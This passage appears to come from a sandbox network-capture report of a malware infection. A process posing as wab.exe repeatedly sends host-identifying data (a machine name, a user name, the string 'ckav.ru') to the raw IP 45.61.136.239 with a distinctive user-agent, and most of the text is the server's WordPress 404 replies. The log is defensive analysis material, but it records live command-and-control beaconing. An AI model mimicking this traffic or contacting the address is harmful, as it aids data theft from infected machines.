                  Jul 3, 2024 09:42:48.495089054 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:48.495138884 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:42:48.495176077 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:42:48.495208979 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:48.495242119 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:48.495290995 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:48.495327950 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
                  Jul 3, 2024 09:42:48.495357037 CEST224INData Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d
                  Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.74972245.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:48.641217947 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:48.646121979 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:52.335706949 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:49 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:52.335731030 CEST224INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
                  Jul 3, 2024 09:42:52.335742950 CEST1236INData Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e
                  Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
                  Jul 3, 2024 09:42:52.335755110 CEST1236INData Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21
                  Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.ge
                  Jul 3, 2024 09:42:52.335766077 CEST1236INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28
                  Data Ascii: ion(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</scrip
                  Jul 3, 2024 09:42:52.335777998 CEST672INData Raw: 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31
                  Data Ascii: ffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-them
                  Jul 3, 2024 09:42:52.335796118 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:52.335828066 CEST224INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
                  Jul 3, 2024 09:42:52.335836887 CEST1236INData Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73
                  Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
                  Jul 3, 2024 09:42:52.335846901 CEST224INData Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c
                  Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.74972345.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:52.492042065 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:52.496962070 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:56.404045105 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:53 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:56.404077053 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:56.404097080 CEST448INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:56.404113054 CEST1236INData Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26
                  Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
                  Jul 3, 2024 09:42:56.404128075 CEST1236INData Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d
                  Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                  Jul 3, 2024 09:42:56.404145002 CEST448INData Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61
                  Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
                  Jul 3, 2024 09:42:56.404175043 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:56.404236078 CEST224INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
                  Jul 3, 2024 09:42:56.404251099 CEST1236INData Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73
                  Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
                  Jul 3, 2024 09:42:56.404258966 CEST224INData Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c
                  Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.74972445.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:56.548578978 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:56.553491116 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:59.589202881 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:57 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
